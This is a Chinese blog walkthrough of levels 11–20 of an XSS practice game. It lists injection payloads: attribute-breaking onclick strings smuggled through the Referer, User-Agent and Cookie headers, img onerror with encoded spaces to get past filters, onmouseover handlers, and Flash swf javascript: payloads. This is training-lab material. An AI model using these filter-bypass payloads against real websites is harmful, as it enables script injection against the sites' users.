文章目录[隐藏]
前文:XSS游戏挑战详解(上)
查看源代码,发现本关与第十关类似,还发现t_ref参数的值包含上一题提交的参数
此时,利用burp抓包,修改referer
" type="text" οnclick="alert(1)
同上,查看源代码,发现t_ua参数的值为User-Agent的值,用burp抓包,改User-Agent的值
" type=" text " οnclick="alert ( 1 )
因本机环境有点问题,无法抓包改包,这里就不上图片了
同上,查看源代码,发现t_cook参数的值为cookie的值,用burp抓包,改cookie的值。
Cookie: user =call+me+maybe%3F " type=" text " οnclick="alert ( 1 );
查看源码,通过iframe标签引入引入了一个URL,但网址打不开,放弃。(乌云的漏洞?已经闭站了)
具体可以看 https://www.cnhackhy.com/41840.html#toc-13了解
查看源码,发现包含一个angularjs文件
这文件不知道有啥用,参考:https://www.cnhackhy.com/41840.html#toc-14 Angularjs教程:菜鸟教程
level15.php? src = 'level1.php?name=test<img src=1 οnerrοr=alert(1)>'
根据地址栏的参数,尝试最基本的弹窗,发现script被过滤进而尝试利用img标签,发现空格被过滤成 将空格替换成编码%0a
<img%0asrc = ""%0aonerror =alert ( 1 )>
查看源码,发现URL地址栏的两个参数被传入到以下位置
更改数值后,发现改变成功,这可能是个输出点
插入最基本的弹窗代码
发现<>被过滤,尝试用on事件,成功!
onmouseover =alert ( )
查看源码,发现跟第十七关似乎一模一样
直接利用十七关的代码
onmouseover =alert ( )
考的是flash xss,不理解,又没有工具,具体参考:
https://www.jianshu.com/p/4e3a517bc4ea
flash xss,需要对flash的反编译对源码进行分析,这里使用jpexs-decompiler来分析,首先定位getURL函数
然后追踪到sIFR的内容
得知version参数可以传入loc4变量中,即sIFR的内容中,但是getURL只在内容为link时打开,所以分析contentIsLink函数
所以我们可以构造 标签来传值
level19.php?arg01 =version&arg02 =< a href = "javascript:alert(1)"> 123< / a>
这题是zeroclipboard.swf的xss,知识盲区,具体参考:https://www.jianshu.com/p/4e3a517bc4ea
level20.php?arg01 =id&arg02 =\%22 ) ) }catch (e ) { }if (!self.a )self.a =!alert ( 1 ) //%26width%26height
行云博客 - 免责申明 本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。 本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。 如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我联系处理。敬请谅解!
本文链接:https://www.xy586.top/4074.html
转载请注明文章来源:行云博客 » XSS游戏挑战详解(下)